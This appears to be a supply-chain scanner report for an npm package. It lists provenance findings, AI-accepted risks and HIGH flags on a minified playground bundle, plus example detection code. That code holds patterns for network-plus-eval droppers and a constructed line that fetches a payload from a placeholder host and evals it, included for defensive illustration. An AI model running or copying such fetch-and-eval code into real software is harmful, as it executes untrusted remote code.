
@cubejs-backend/server-core

Cube.js base component to wire all backend components together

Versions: 23
License: Apache-2.0
Install scripts: No
Provenance: Verified

Supply chain provenance

Status for the latest visible version.

Signals checked:
- SLSA provenance attestation
- npm registry signatures
- gitHead linked
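The three signals above can be read straight off the npm version manifest (the `versions[<ver>]` entry of the packument). The script below is an added example, not the scanner's code and not Cube.js code; both manifests are constructed to show the shape of registry data, and every hash, key id, signature, commit id and URL in them is a placeholder.

```javascript
// Added example: derive the three provenance signals from an npm version manifest.
// Manifests are CONSTRUCTED; all hashes, key ids, signatures, commit ids and URLs
// are placeholders, not real registry values.

const SLSA_V1_PREDICATE = 'https://slsa.dev/provenance/v1';

// `gitHead` and `repository` come from the publisher's package.json and git state,
// `dist.signatures` is the registry's signature over the tarball, and
// `dist.attestations` exists only when the publish carried a provenance attestation
// (e.g. `npm publish --provenance` from a supported CI runner).
const attestedManifest = {
  name: '@cubejs-backend/server-core',
  version: '1.6.55',
  gitHead: '0000000000000000000000000000000000000000',          // placeholder commit id
  repository: { type: 'git', url: 'git+https://github.com/example/repo.git' }, // placeholder
  dist: {
    integrity: 'sha512-PLACEHOLDER',
    signatures: [{ keyid: 'SHA256:PLACEHOLDER', sig: 'PLACEHOLDER' }],
    attestations: {
      url: 'https://registry.npmjs.org/-/npm/v1/attestations/PLACEHOLDER',
      provenance: { predicateType: SLSA_V1_PREDICATE },
    },
  },
};

// Constructed manifest for a version published by hand, with no provenance flag
// and no git metadata: the registry still signs it, but that is all.
const handPublishedManifest = {
  name: 'example-pkg',
  version: '0.1.0',
  dist: {
    integrity: 'sha512-PLACEHOLDER',
    signatures: [{ keyid: 'SHA256:PLACEHOLDER', sig: 'PLACEHOLDER' }],
  },
};

function isGitUrl(url) {
  return typeof url === 'string' && /^(git\+)?(https?|ssh|git):\/\//.test(url);
}

// Returns the three signals plus a "verified" verdict that requires all of them.
function provenanceSignals(manifest) {
  const dist = manifest.dist || {};
  const predicate =
    dist.attestations && dist.attestations.provenance
      ? dist.attestations.provenance.predicateType
      : null;
  const slsaAttestation = predicate === SLSA_V1_PREDICATE;
  const registrySignature =
    Array.isArray(dist.signatures) && dist.signatures.some((s) => s.keyid && s.sig);
  const repo = manifest.repository;
  const repoUrl = typeof repo === 'string' ? repo : repo && repo.url;
  // "linked" here means: a full 40-hex commit id plus a git repository URL to resolve it against.
  const gitHeadLinked = /^[0-9a-f]{40}$/i.test(manifest.gitHead || '') && isGitUrl(repoUrl);
  return {
    slsaAttestation,
    registrySignature,
    gitHeadLinked,
    predicateType: predicate,
    verified: slsaAttestation && registrySignature && gitHeadLinked,
  };
}

// Names of the signals a manifest lacks, in the order the page lists them.
function missingSignals(manifest) {
  const s = provenanceSignals(manifest);
  return ['slsaAttestation', 'registrySignature', 'gitHeadLinked'].filter((k) => !s[k]);
}

console.log('attested:', provenanceSignals(attestedManifest));
console.log('hand-published, missing:', missingSignals(handPublishedManifest));
```

Reading the manifest only tells you the fields are there. The real check is `npm audit signatures`, which verifies the registry signatures and the provenance attestations of the packages in the current install against npm's published keys. Either way, an attestation proves the tarball came out of the named build; it says nothing about what the code in it does, so a HIGH source-diff finding still needs review regardless of the INFO provenance finding beside it.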

Maintainers

cubedevinc, statsbot, keydunov, maxim_cube

Accepted risks

Findings the reviewer chose to accept rather than block on.

Source | Rule | Reason | Accepted by | When
source-diff | net-exec-file:playground/assets/index-Dp9g9mH4.js | AI (source-diff): Network calls and dynamic code in playground bundle are standard React SPA patterns (fetch for modulepreload), not dropper behavior. | ai |
source-diff | obfuscated-file:playground/assets/index-Dp9g9mH4.js | AI (source-diff): Bundled React/Vite SPA for Cube.js playground UI; minified output is expected and consistent across versions. | ai |
semgrep | semgrep:api-obfuscation-reflect | AI (semgrep): Fires in bundled playground CSS-in-JS asset; not malicious API obfuscation. | ai |
publish-pattern | dormant-publish | AI (publish-pattern): SLSA provenance attestation present; no material changes from prior version; established monorepo with 1160 published versions. | ai |
dependencies | unvetted-dep:@cubejs-backend/dotenv | AI (dependencies): Scoped @cubejs-backend dependency; part of the same Cube.js monorepo ecosystem, stable across versions. | ai |
phantom-deps | phantom-dep:moment | AI (phantom-deps): moment is a declared runtime dep; phantom-dep heuristic false positive for this package. | ai |
phantom-deps | phantom-dep:codesandbox-import-utils | AI (phantom-deps): codesandbox-import-utils is a declared runtime dep; phantom-dep heuristic false positive for this package. | ai |
phantom-deps | phantom-dep:semver | AI (phantom-deps): semver is a declared runtime dep; phantom-dep heuristic false positive for this package. | ai |
bogus-package | bogus-package | AI (bogus-package): Monorepo sub-package; README links to docs, no keywords is normal for internal packages. | ai |

Versions (showing 23 of 23)

Version | Deps | Published
1.6.55 | 31 / 13 |
1.6.54 | 31 / 13 |
1.6.53 | 31 / 13 |
1.6.52 | 31 / 13 |
1.6.51 | 31 / 13 |
1.6.50 | 31 / 13 |
1.6.49 | 31 / 13 |
1.6.48 | 31 / 13 |
1.6.47 | 31 / 13 |
1.6.46 | 31 / 13 |
1.6.45 | 31 / 13 |
1.6.44 | 31 / 13 |
1.6.43 | 31 / 13 |
1.6.42 | 31 / 13 |
1.6.41 | 31 / 13 |
1.6.40 | 31 / 13 |
1.6.39 | 31 / 13 |
1.6.37 | 31 / 13 |
1.6.36 | 31 / 13 |
1.6.35 | 31 / 13 |
1.6.34 | 31 / 13 |
1.6.33 | 31 / 13 |
1.6.32 | 31 / 13 |

v1.6.55

1 finding
INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.54

1 finding
INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.53

1 finding
INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.52

3 findings
HIGH | New obfuscated file: playground/assets/index-Dp9g9mH4.js | rule: source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH | New file with network + code execution: playground/assets/index-Dp9g9mH4.js | rule: source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
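The two HIGH findings for this version, and the accepted-risk entries that close them, describe a pair of heuristics: a line-length threshold for minified or obfuscated code, and co-occurrence of a network call with a dynamic-code primitive. Below is an added example of those heuristics plus the second pass a reviewer runs before accepting the result; it is not the scanner's code and not the Cube.js bundle. Both input files are constructed: the SPA stand-in imitates two idioms that commonly appear in bundles (Vite's modulepreload polyfill calling fetch, and regenerator-runtime installing itself through Function), and the dropper stand-in uses a non-routable example host. The idiom allowlist is an assumption made for the example.

```javascript
// Added example: the source-diff heuristics behind "obfuscated-file" and "net-exec-file",
// with a triage pass that separates "payload is executed" from "both tokens appear".
// Inputs are CONSTRUCTED; the real playground bundle is not on the page.

const MAX_LINE_CHARS = 3000; // threshold quoted in the finding text

const NETWORK_RE = /\bfetch\s*\(|\bXMLHttpRequest\b|\bWebSocket\s*\(|\bhttps?\.(?:get|request)\s*\(/;
const DYNCODE_RE = /\beval\s*\(|\bnew\s+Function\s*\(|\bFunction\s*\(\s*["']/;

// A response body reaching an evaluator in the same chain, e.g.
// fetch(u).then(r => r.text()).then(t => eval(t))  or  .then(eval)
const PAYLOAD_TO_EVAL_RE =
  /\.(?:text|json)\(\)[\s\S]{0,120}?\b(?:eval|Function)\s*\(|\.then\s*\(\s*eval\s*\)/;

// Assumption for this example: idioms that explain the tokens in ordinary bundles.
// Vite's modulepreload polyfill calls fetch(link.href); regenerator-runtime runs
// Function("r", "regeneratorRuntime = r")(runtime). A hint for the reviewer, not a verdict.
const BUNDLE_IDIOM_RES = [/modulepreload/, /regeneratorRuntime\s*=\s*r/];

// First pass: what the scanner reports. Returns the rule ids that fired.
function scanFile(path, text) {
  const longestLine = text.split('\n').reduce((m, l) => Math.max(m, l.length), 0);
  const findings = [];
  if (longestLine > MAX_LINE_CHARS) findings.push('obfuscated-file');
  if (NETWORK_RE.test(text) && DYNCODE_RE.test(text)) findings.push('net-exec-file');
  return { path, longestLine, findings };
}

// Second pass: does the fetched data flow into the evaluator, or do the two just coexist?
function triage(text, findings) {
  if (!findings.includes('net-exec-file')) return 'no-net-exec';
  if (PAYLOAD_TO_EVAL_RE.test(text)) return 'review'; // network payload is executed
  if (BUNDLE_IDIOM_RES.some((re) => re.test(text))) return 'likely-bundle-idiom';
  return 'review'; // unexplained co-occurrence stays with the human
}

// Constructed stand-in for a minified SPA bundle: a single line well over the threshold.
const SPA_BUNDLE =
  '(function(){const t=document.createElement("link").relList;' +
  'if(t&&t.supports&&t.supports("modulepreload"))return;' +
  'for(const e of document.querySelectorAll(\'link[rel="modulepreload"]\'))r(e);' +
  'function r(e){if(e.ep)return;e.ep=!0;fetch(e.href,{credentials:"same-origin"})}})();' +
  'Function("r","regeneratorRuntime = r")(runtime);' +
  'var a=1;'.repeat(400);

// Constructed dropper shape: payload fetched and handed straight to eval.
const DROPPER = [
  'const u = "https://example.invalid/payload";',
  'fetch(u).then(r => r.text()).then(t => eval(t));',
].join('\n');

for (const [path, text] of [['playground/assets/index-constructed.js', SPA_BUNDLE], ['install.js', DROPPER]]) {
  const result = scanFile(path, text);
  console.log(path, result.findings, '->', triage(text, result.findings));
}
```

Two things follow for the workflow on this page. The triage result is a hint, not a verdict: an attacker can paste the allowlisted idioms into a dropper, so "likely-bundle-idiom" still ends in a human accepted-risk entry like the ones above. And a diff-based rule should key on the file's content hash, so that the same unchanged bundle re-flagged in 1.6.49 through 1.6.52 is linked to the existing acceptance instead of producing four fresh HIGH findings.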

v1.6.51

3 findings
HIGH | New obfuscated file: playground/assets/index-Dp9g9mH4.js | rule: source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH | New file with network + code execution: playground/assets/index-Dp9g9mH4.js | rule: source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.50

3 findings
HIGH | New obfuscated file: playground/assets/index-Dp9g9mH4.js | rule: source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH | New file with network + code execution: playground/assets/index-Dp9g9mH4.js | rule: source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.49

3 findings
HIGH | New obfuscated file: playground/assets/index-Dp9g9mH4.js | rule: source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH | New file with network + code execution: playground/assets/index-Dp9g9mH4.js | rule: source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.48

1 finding
INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.47

1 finding
INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.46

1 finding
INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.45

1 finding
INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.44

1 finding
INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.43

1 finding
INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.42

1 finding
INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.41

1 finding
INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.40

1 finding
INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.39

1 finding
INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.37

1 finding
INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.36

1 finding
INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.35

1 finding
INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.34

1 finding
INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.33

1 finding
INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.32

1 finding
INFO | Has SLSA provenance attestation | rule: provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.